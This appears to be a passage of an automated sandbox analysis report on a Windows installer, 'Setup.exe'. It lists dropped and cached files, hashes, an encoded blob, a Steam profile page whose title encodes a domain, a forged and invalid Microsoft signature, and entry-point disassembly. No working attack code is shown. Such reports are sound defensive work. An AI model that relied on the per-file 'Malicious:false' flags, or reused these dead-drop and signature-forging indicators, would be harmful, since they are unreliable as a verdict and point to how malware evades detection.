                                                                                                                                                                                                                                                    SHA-512:BA0178BA1674E322E27AFFA77C7DE66E2F587D8C785FEF3DFB103BC2983B73CD55EC03F324439D25607DF3F11ACFB95E6D5BA3722011F65EE11A750EA67387C3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: r5q cmFzMi5zaG9wt6t</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cdn=fastly" re

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\f1575b64-8492-4e8b-b102-4d26e8c70371[1].txt

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (30928), with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):30928
                                                                                                                                                                                                                                                    Entropy (8bit):5.443822786604349
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:yFvPUMUHoRcE6fVSZSu4PbqGXan43ExEqB7L:y9P1RcffVSZpig2uv
                                                                                                                                                                                                                                                    MD5:2928EFC088594ACABC759E97008D95FC
                                                                                                                                                                                                                                                    SHA1:15291388DC125686205796DC544CEFA5703BDB55
                                                                                                                                                                                                                                                    SHA-256:38D6EB08CC649AD11A1A23203B33CC526DA438A57E373673D44F8B5EEAFE64B4
                                                                                                                                                                                                                                                    SHA-512:0290E2FD0567EC82D2EBBB4AC19339940F910545F4E6FD0E9E55FC0FFAFB3817CB3DDC08C9EED4A2E6C1AAABCE21A4B791302262D804F22019AE795196CC70D8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:QxdQEw5iTBBdIgIXUG1oWg8QHyJIFwgTaGV7XVBhVGludltWUF5WXGR2WkNbVFJub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXUVlGVlpXHWVAUBBMGEIVXBE6GldubVcBFR4RcBoPEG1odVhRUmxkaXVeW15bV29ce11AXllcF2FLU2RpZ0JRSxd2UnRZFx4TQBsNAx8iSFsQCxZaX0BcbV0bV0lRG0oeSCJWFwgTVmVrUQsiFBdCEw4ba25/b1tUXm1oflhdVGxdaW5yXEtYX1YgelBGUGhlYkFWchhxU0VVGxsQRyICBB4TRFcVCBFjUEddXFEXUkpWIkUZSRNaGw0QUVxkVgoTGBtHEAkiZGl+XldYW25vR1daVV1RZWtxW3JXWFcRcFxBbm9VS1BAEXBYQ1MRLBpBEAsFFRVCXSICF1FZRlZaVx1lQFAQTBhCFVwROhpXbm1XARUeEXAaDxBtaHVYUVJsZGl1XlteW1dvXHtdQF5ZXBdnXXNMVFBdUWVrZ0BlShV2UEBYFR4RdBoPAx0WSVkQCSJbXUBeWVwZV0tlGkgeShZXFQgRYmRpUQkWFRVCEToaaW59W1pWXm9cf1pdVlhca25waEpaX1QUelZcUnJBaW5kR1xFEndhTFQQHRZNFQgCLBpFXBMOG1RaQW9VUBxUTFwVTx97GlsQCxZba25QMggXHhNEGw0Qb1x0WlFQWGVrd0NpWxViQ11PVlFKIHpHXUZHXEVub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXV0FdWhlXS2UaSB5KFlcVCBFiZGlRAAEbGxBDIgIXbm14VlRTX1xkY1tHVVVTW29cbUZXQxR9VkZSIhQXRhMOCBsQQ24aDxBHXU9WXldpFlBKVBZEG0kRbhoPEFNoZVQABSIUF0ITDhtrbn9vW1RebWgKAQJxcldCQVRGZWtwQW9PRldDaGViQVZyGHFTRVUbGxBHIgIEHhNEVxUIEWJKWkVCUUsEBAMu

                                                                                                                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                                                                                                    Entropy (8bit):4.466317720853292
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:qIXfpi67eLPU9skLmb0b4rWSPKaJG8nAgejZMMhA2gX4WABl0uNHdwBCswSb/:fXD94rWlLZMM6YFH1+/
                                                                                                                                                                                                                                                    MD5:0FCC9CED19F2526709F1AB4FEE7AD166
                                                                                                                                                                                                                                                    SHA1:65A09FB3B4A7CEA3305FEDF7E4E6ABB0AEC8A8A5
                                                                                                                                                                                                                                                    SHA-256:F5F353849023EC3932E14254C7B8776EBE36425A7E418315C43EA6132270906A
                                                                                                                                                                                                                                                    SHA-512:A9185C87AE2D270198C7B1E3DDE247E0AE357C28862C2C8EE242EE1737642E9FDF0A75D1C8F4998F3569C6C1CF3668CC41556AF0E6FC3C1BF4A2C9A0BF93A66D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.".X...............................................................................................................................................................................................................................................................................................................................................c5.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    Chrome Cache Entry: 69

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):166
                                                                                                                                                                                                                                                    Entropy (8bit):4.854864396080962
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Vwp+EHwwBHsLpYJWriFGHTe7vTxZVVdMR7GWjLwWkzXFETH1u4:VwQEH5BHsL2YriFGHTAr8FGAwWeXFELN
                                                                                                                                                                                                                                                    MD5:4DCC0ED0AF2893FCA50E9233DE7DE2B2
                                                                                                                                                                                                                                                    SHA1:9089C63E40808E4544ECAAE24D136A5DFC837BD3
                                                                                                                                                                                                                                                    SHA-256:5B4024E9DAB7EE7ACAB73AF0CDFBC8D81C8406637084F6DFE97C91735E74B3FA
                                                                                                                                                                                                                                                    SHA-512:5267AD3100D920729A450186CC8FB44DD869A88A49667AC62A4DB6C42CF8E0282A5A978EA17D43A3760F203782A9928D73362CCA4B3940415382660BB41A7D41
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                    Preview:)]}'.["",[],[],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggesteventid":-2079642914939795008,"google:suggesttype":[],"google:verbatimrelevance":851}]

                                                                                                                                                                                                                                                    Chrome Cache Entry: 70

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):117446
                                                                                                                                                                                                                                                    Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                    MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                    SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                    SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                    SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                    Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                                                    Chrome Cache Entry: 71

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                    Chrome Cache Entry: 72

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):132767
                                                                                                                                                                                                                                                    Entropy (8bit):5.436989257248335
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:fskJQ7O4N5dTm+syHEt4W3XdQ4Q6AuSr/nUW2i6o:f5Q7HTt/sHdQ4Q6ADfUW8o
                                                                                                                                                                                                                                                    MD5:8B24D6304AE4C2F5478CCD93895CF7E9
                                                                                                                                                                                                                                                    SHA1:3591F73EDC79FA28DA5F7DF4E713A98FAD1F246C
                                                                                                                                                                                                                                                    SHA-256:F17FBDF1532688298AA7BC81A208922484C1DED7400CE79D945B46B9846990E7
                                                                                                                                                                                                                                                    SHA-512:C582B159B71857975785502A4B716DC4F4609ADDA1ABBFBDA7A60D935D7AA3F1F4EF8A0A0E4F2CFC8D82F38DDD67CDDBFE15BF2A29D868F489CA517D8FAD31E3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                    Chrome Cache Entry: 73

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):175897
                                                                                                                                                                                                                                                    Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                                                    MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                    SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                    SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                    SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                                    Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

                                                                                                                                                                                                                                                    Chrome Cache Entry: 74

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):5162
                                                                                                                                                                                                                                                    Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                    MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                    SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                    SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                    SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                    Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                    Chrome Cache Entry: 75

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):1660
                                                                                                                                                                                                                                                    Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                    MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                    SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                    SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                    SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Entropy (8bit):0.8030740299766413
                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                                                                                                                                                                                                    • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                    File name:Setup.exe
                                                                                                                                                                                                                                                    File size:76'542'479 bytes
                                                                                                                                                                                                                                                    MD5:f18fa7132a5eda29041fdd8ae85363db
                                                                                                                                                                                                                                                    SHA1:4de6de8445b5dc6897461b684da74df7e9673f78
                                                                                                                                                                                                                                                    SHA256:543c81da09d6669ddf5fbb2d6c3889d7dabfd166d3f726349c30a51c542a2f50
                                                                                                                                                                                                                                                    SHA512:a61f193ea0e2bc13127b71756ebf90c98b09d8940105008eddce4f85adbb0c2f3adc526a2eebb6c81e6aca170d74dde974b0bf16df368906754c8177e3634beb
                                                                                                                                                                                                                                                    SSDEEP:49152:Tdx4HDQNJL0VR6SgMt+k4RiP+RmXMjiINiMq95FoCVHNTQTEj3333wIPmXs4rTLa:4HDYsqiPRhINnq95FoCVB3333j+vm
                                                                                                                                                                                                                                                    TLSH:1DF72926E3CC23A9F71716750A33B2D39937AF1023127CD752FD15498E2B4D81A3AA5B
                                                                                                                                                                                                                                                    File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                                    Icon Hash:0b1916161d151191

                                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Entrypoint:0x6c5660
                                                                                                                                                                                                                                                    Entrypoint Section:.itext
                                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                    Time Stamp:0x6258476F [Thu Apr 14 16:10:23 2022 UTC]
                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                                                                                    Import Hash:8507116e3d0e7e02e36e7dc5b8aa1af8

                                                                                                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                                                    Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                                    • 15/12/2020 21:24:20 02/12/2021 21:24:20
                                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                                    • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                                    Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                                                                                                                                                                    Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                                                                                                                                                                    Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                                                                                                                                                                    Serial:33000003DFFB6AE3F427ECB6A30000000003DF

                                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                                                    add esp, FFFFFFF0h
                                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                                    mov eax, 006BA0FCh
                                                                                                                                                                                                                                                    call 00007F239C5BFA7Ah
                                                                                                                                                                                                                                                    mov eax, dword ptr [006CEEC4h]
                                                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                    mov eax, dword ptr [eax+00000188h]
                                                                                                                                                                                                                                                    push FFFFFFECh
                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                    call 00007F239C5C3E15h
                                                                                                                                                                                                                                                    mov edx, dword ptr [006CEEC4h]
                                                                                                                                                                                                                                                    mov edx, dword ptr [edx]
                                                                                                                                                                                                                                                    mov edx, dword ptr [edx+00000188h]
                                                                                                                                                                                                                                                    and eax, FFFFFF7Fh
                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                    push FFFFFFECh
                                                                                                                                                                                                                                                    push edx
                                                                                                                                                                                                                                                    call 00007F239C5C3E01h
                                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                    push 006C56F1h
                                                                                                                                                                                                                                                    push dword ptr fs:[eax]
                                                                                                                                                                                                                                                    mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                                                    push 00000001h
                                                                                                                                                                                                                                                    call 00007F239C5C315Ch
                                                                                                                                                                                                                                                    call 00007F239C868CEBh
